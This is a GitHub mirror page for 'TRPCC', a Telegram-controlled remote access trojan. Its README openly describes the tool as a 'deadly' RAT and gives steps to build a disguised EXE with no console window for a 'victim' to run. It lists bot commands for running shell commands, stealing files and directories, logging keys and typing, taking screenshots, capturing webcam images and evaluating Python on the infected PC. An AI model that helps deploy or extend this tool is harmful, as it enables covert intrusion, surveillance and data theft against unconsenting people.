Git Product home page Git Product logo

trpcc's Introduction


TRPCC

Telegram Remote PC Control. [ALPHA V1.0].

Deadly tool for remote PC controlling (RAT).



⚠ WARNING ⚠
I do not accept responsibility for any use of this tool.



Using:

  1. git clone https://github.com/xzripper/trpcc
  2. python deps.py
  3. python trpcc.py
  4. Set Telegram bot token (2). (Create bot and get token in @BotFather)
  5. Compile bot to .EXE (1).
  6. Set your application name.
  7. Debug (y/N)? Console will be shown if debug enabled, else no console will be open.
  8. Icon (.ico supported only), none if no icon.
  9. Wait.

Done! Your EXE is ready! Now victim should run EXE file and reboot PC (can reboot later). Done! Start your bot and control PC!

Commands.

Generic commands:
/start - Start bot.
/help - Get help.
/about - Get about.

System commands:
/sysinfo - Get system information.
/syscom - Pass command to console and get output. Can cause TelegramBadRequest error if output is too big.

Work with files:
/insertfile (DIRECTORY) - Insert file into directory. After passing command you should send file you want to insert.
/getfile (FILE) - Get file by path.
/getdir (DIRECTORY) - Get directory as ZIP.
/dir (DIRECTORY) - Get directory content. Can cause TelegramBadRequest error if output is too big.
/exists (FILE/DIRECTORY) - Is file/directory exists.
/delete (FILE/DIRECTORY) - Delete file/directory.
/startfile (FILE) - Start file.

Hardware (keyboard, mouse, monitor):
/sendkeys (KEYS) - Press keys. Hotkeys and multiple key pressing at once supported: alt+tab,win+space.
/type (TEXT) - Type text.
/mousebutton (BUTTON) - Click mouse button. Buttons: 1 - Right, 2 - Left, 3 - Middle.
/setmousepos (X) (Y) - Set cursor position.
/enablemonitor - Enable monitor. Very unstable.
/disablemonitor - Disable monitor. Very unstable.

Screenshots:
/screenshot - Make screenshot.

Power:
/shutdown - Shutdown PC.
/reboot - Reboot PC.

Python:
/evalpython (CODE(EXPRESSION)) - Evaluate Python expression. Can evaluate pretty big code if you can write one-liners.

Time:
/date - Get local PC date.

Message Boxes:
/msgbox [TITLE] [TEXT] - Show messsage box.

Clipboard:
/copy (TEXT) - Copy text to clipboard.

Sounds:
/playsound - Play sound from controller side. After passing command you should send MP3/WAV file to play sound.
/playlocalsound (PATH) - Play sound from client side.

Windows:
/getactivewindow - Get active window name, title, HWND.
/closeactivewindow - Close active window.

Volume:
/upvolume (AMOUNT) - Increase volume.
/downvolume (AMOUNT) - Decrease volume.

Webcamera:
/webcamimage (INDEX) - Capture image from web camera. Indexes start from 0 and end when all available web cameras end.

Bot commands:
/alive - Is bot alive.
/cancelloads - Cancel all file loads. Use it to cancel file loads after using playsound, or insertfile.

TRPCC V1.0 By xzripper.

trpcc's People

Contributors

xzripper avatar

Stargazers

 avatar  avatar Фёдор avatar  avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.